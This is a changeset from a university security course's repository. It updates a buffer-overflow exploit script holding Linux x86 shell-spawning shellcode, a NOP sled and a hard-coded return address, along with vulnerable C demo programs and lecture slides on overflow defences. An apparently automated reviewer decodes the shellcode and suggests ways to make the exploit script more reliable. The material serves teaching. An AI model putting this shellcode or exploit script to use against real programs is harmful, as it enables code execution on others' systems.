added material
authorChristian Urban <christian dot urban at kcl dot ac dot uk>
Wed, 09 Oct 2013 15:51:03 +0100
changeset 115 c4008b31df8e
parent 114 3822d91a4639
child 116 be57673022d3
added material
programs/args3
progs/C2a.c
progs/C4.c
slides/info.pdf
slides/info.tex
slides/slides03.pdf
slides/slides03.tex
--- a/programs/args3	Tue Oct 08 13:01:59 2013 +0100
+++ b/programs/args3	Wed Oct 09 15:51:03 2013 +0100
@@ -1,8 +1,8 @@
 #!/bin/sh
 
-// shellscript that overwrites the buffer with 
-// some payload for opening a shell (the payload
-// cannot contain any \x00)
+# shellscript that overwrites the buffer with 
+# some payload for opening a shell (the payload
+# cannot contain any \x00)
 
 
 shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" 
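Review bot: The reworded header on the added lines still leaves undocumented what the payload does and which platform it targets, which is the first thing anyone reusing this script needs. The bytes on the `shellcode=` context line decode to the classic 24-byte Linux/x86-32 `execve("//bin/sh")` payload (`xor eax,eax`; push `n/sh`, `//bi`; `mov al,0x0b`; `int 0x80`), so it cannot work on a 64-bit or non-Linux target, and the `\x00` restriction presumably exists because the vulnerable program copies the input as a C string — worth confirming against that program, which is not in this changeset. I would extend the header to `# 32-bit x86 Linux execve("//bin/sh") shellcode (24 bytes); must be NUL-free because the target reads it as a C string`.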
@@ -23,6 +23,6 @@
 
 padding=`perl -e 'print "\x90" x 80'`
 
-// need s correct address in order to run
+# need s correct address in order to run
 printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00"
 
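Review bot: `printf $shellcode$padding"\xe8\xf8\xff\xbf..."` on the last line hands the payload to printf as its format string, unquoted: any `%` byte (0x25) in a future payload would be parsed as a conversion, and the unquoted `$shellcode`/`$padding` are subject to word splitting and globbing. The safer form is `printf '%b' "$shellcode$padding\xe8\xf8\xff\xbf\x00\x00\x00\x00"`. The hard-coded `\xe8\xf8\xff\xbf` (0xbffff8e8 little-endian) is a stack address that only lines up with ASLR disabled in this exact environment, and the added comment above it ("need s correct address", typo for "a") should say so: `# return address 0xbffff8e8 (little-endian): stack address that presumably points back into the buffer; requires ASLR off and must be re-measured per machine`. Note also that `\x` escapes in printf are a bash extension; if `#!/bin/sh` resolves to dash they are emitted literally, so `#!/bin/bash` may be the intended interpreter.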
--- a/progs/C2a.c	Tue Oct 08 13:01:59 2013 +0100
+++ b/progs/C2a.c	Wed Oct 09 15:51:03 2013 +0100
@@ -1,5 +1,6 @@
-// Since gets() is insecure and produces lots of warnings, 
-// I use my own input function instead.
+// Since gets() is insecure and produces lots 
+// of warnings, thereofre I use my own input 
+// function instead.
 char ch;
 int i;
 
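Review bot: The reworded header on the added lines has a typo (`thereofre`) and the "Since … therefore" construction is redundant; `// gets() is insecure and produces lots of warnings, so I use my own input function instead.` reads cleaner. More importantly, the slide that includes this file (slides03.tex: "A programmer might be careful, but still introduce vulnerabilities") suggests the replacement reader is itself the bug, so the comment as written is misleading — it implies the home-grown function is the safe choice. If that is the intended lesson, say so: `// NOTE: this replacement is unbounded too; it is the vulnerability this example demonstrates`. The globals `ch` and `i` and the function that uses them lie outside the hunk, so I cannot confirm the missing bound from here.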
--- a/progs/C4.c	Tue Oct 08 13:01:59 2013 +0100
+++ b/progs/C4.c	Wed Oct 09 15:51:03 2013 +0100
@@ -1,10 +1,8 @@
 #include<stdio.h>
 #include<string.h>
 
-// a program that just prints the argument
+// a program that "just" prints the argument
 // on the command line
-//
-// try and run it with %s
 
 
 main(int argc, char **argv)
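Review bot: `main(int argc, char **argv)` on the last line relies on implicit `int`, which C99 removed, GCC warns about (`-Wimplicit-int`) and recent GCC rejects by default; declare it `int main(int argc, char **argv)`. The body of main continues outside the hunk, so I cannot see the printf call the slide refers to. Since the comment is being reworded anyway, the quoted "just" now hints at hidden behaviour without naming it; if withholding the hint is deliberate for the exercise that is fine, otherwise `// the argument reaches printf as its format string` would make the example self-explanatory.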
Binary file slides/info.pdf has changed
--- /dev/null	Thu Jan 01 00:00:00 1970 +0000
+++ b/slides/info.tex	Wed Oct 09 15:51:03 2013 +0100
@@ -0,0 +1,104 @@
+\documentclass[dvipsnames,14pt,t]{beamer}
+\usepackage{beamerthemeplaincu}
+%%\usepackage[T1]{fontenc}
+\usepackage[latin1]{inputenc}
+\usepackage{mathpartir}
+\usepackage[absolute,overlay]{textpos}
+\usepackage{ifthen}
+\usepackage{tikz}
+\usepackage{pgf}
+\usepackage{calc} 
+\usepackage{ulem}
+\usepackage{courier}
+\usepackage{listings}
+\renewcommand{\uline}[1]{#1}
+\usetikzlibrary{arrows}
+\usetikzlibrary{automata}
+\usetikzlibrary{shapes}
+\usetikzlibrary{shadows}
+\usetikzlibrary{positioning}
+\usetikzlibrary{calc}
+\usepackage{graphicx} 
+
+\definecolor{javared}{rgb}{0.6,0,0} % for strings
+\definecolor{javagreen}{rgb}{0.25,0.5,0.35} % comments
+\definecolor{javapurple}{rgb}{0.5,0,0.35} % keywords
+\definecolor{javadocblue}{rgb}{0.25,0.35,0.75} % javadoc
+
+\makeatletter
+\lst@CCPutMacro\lst@ProcessOther {"2D}{\lst@ttfamily{-{}}{-{}}}
+\@empty\z@\@empty
+\makeatother
+
+\lstset{language=Java,
+	basicstyle=\consolas,
+	keywordstyle=\color{javapurple}\bfseries,
+	stringstyle=\color{javagreen},
+	commentstyle=\color{javagreen},
+	morecomment=[s][\color{javadocblue}]{/**}{*/},
+	numbers=left,
+	numberstyle=\tiny\color{black},
+	stepnumber=1,
+	numbersep=10pt,
+	tabsize=2,
+	showspaces=false,
+	showstringspaces=false}
+
+\lstdefinelanguage{scala}{
+  morekeywords={abstract,case,catch,class,def,%
+    do,else,extends,false,final,finally,%
+    for,if,implicit,import,match,mixin,%
+    new,null,object,override,package,%
+    private,protected,requires,return,sealed,%
+    super,this,throw,trait,true,try,%
+    type,val,var,while,with,yield},
+  otherkeywords={=>,<-,<\%,<:,>:,\#,@,->},
+  sensitive=true,
+  morecomment=[l]{//},
+  morecomment=[n]{/*}{*/},
+  morestring=[b]",
+  morestring=[b]',
+  morestring=[b]"""
+}
+
+\lstset{language=Scala,
+	basicstyle=\consolas,
+	keywordstyle=\color{javapurple}\bfseries,
+	stringstyle=\color{javagreen},
+	commentstyle=\color{javagreen},
+	morecomment=[s][\color{javadocblue}]{/**}{*/},
+	numbers=left,
+	numberstyle=\tiny\color{black},
+	stepnumber=1,
+	numbersep=10pt,
+	tabsize=2,
+	showspaces=false,
+	showstringspaces=false}
+
+
+% beamer stuff 
+\renewcommand{\slidecaption}{APP 03, King's College London, 8 October 2013}
+
+
+\begin{document}
+
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+\mode<presentation>{
+\begin{frame}[c]
+
+Dear All,\medskip
+
+While showing how to hack in the last lecture, I forgot to make an important announcement: the next lecture will be a guest lecture given by Richard Overill. He will present non-examinable material. I hope you still come. Richard is an expert in Cybercrime \& Cyberterrorism and often works with the Met Police Security Force. So he has first-hand knowledge about all sorts of hacking.\medskip
+
+The lecture on the 22nd will be "normal" again given by me.  
+
+\end{frame}}
+ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%     
+
+\end{document}
+
+%%% Local Variables:  
+%%% mode: latex
+%%% TeX-master: t
+%%% End: 
+
Binary file slides/slides03.pdf has changed
--- a/slides/slides03.tex	Tue Oct 08 13:01:59 2013 +0100
+++ b/slides/slides03.tex	Wed Oct 09 15:51:03 2013 +0100
@@ -417,6 +417,18 @@
 \end{frame}}
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%   
 
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+\mode<presentation>{
+\begin{frame}[c]
+
+\begin{center}
+\includegraphics[scale=0.45]{pics/trainwreck.jpg}\\
+one general defence mechanism is\\\alert{\bf defence in depth}
+\end{center}
+
+  
+\end{frame}}
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%   
 
 
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
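Review bot: The new slide names "defence in depth" but gives no definition, so a student has only the picture to go on. A one-line gloss under the heading would anchor it, e.g. `several independent protections, so that defeating one does not compromise the whole system`, and it ties directly into the "Protections against Buffer Overflow Attacks" list later in the deck — canaries, non-executable stacks and address-space randomisation are exactly such layers. The image `pics/trainwreck.jpg` is not among the files in this changeset, so the deck only builds if it is already in the repository.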
@@ -526,17 +538,17 @@
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%   
 
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-\mode<presentation>{
-\begin{frame}[c]
-
-\small
-A programmer might be careful, but still introduce vulnerabilities:\bigskip
-
-{\lstset{language=Java}\fontsize{8}{10}\selectfont%
-\texttt{\lstinputlisting{../progs/C2a.c}}}
-
-  
-\end{frame}}
+%\mode<presentation>{
+%\begin{frame}[c]
+%
+%\small
+%A programmer might be careful, but still introduce vulnerabilities:\bigskip
+%
+%{\lstset{language=Java}\footnotesize
+%\texttt{\lstinputlisting{../progs/C2a.c}}}
+%
+% 
+%\end{frame}}
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%   
 
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
@@ -582,7 +594,7 @@
 \small
 \texttt{string} is nowhere used:\bigskip
 
-{\lstset{language=Java}\fontsize{8}{10}\selectfont%
+{\lstset{language=Java}\footnotesize
 \texttt{\lstinputlisting{../progs/C4.c}}}\bigskip
 
 this vulnerability can be used to read out the stack
@@ -593,10 +605,11 @@
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 \mode<presentation>{
 \begin{frame}[c]
-\frametitle{\begin{tabular}{c}Protections against\\ BO Attacks\end{tabular}}
+\frametitle{\begin{tabular}{c}Protections against\\ Buffer Overflow Attacks\end{tabular}}
 
 \begin{itemize}
 \item use safe library functions
+\item stack caneries
 \item ensure stack data is not executable (can be defeated)
 \item address space randomisation (makes one-size-fits-all more difficult)
 \item choice of programming language (one of the selling points of Java)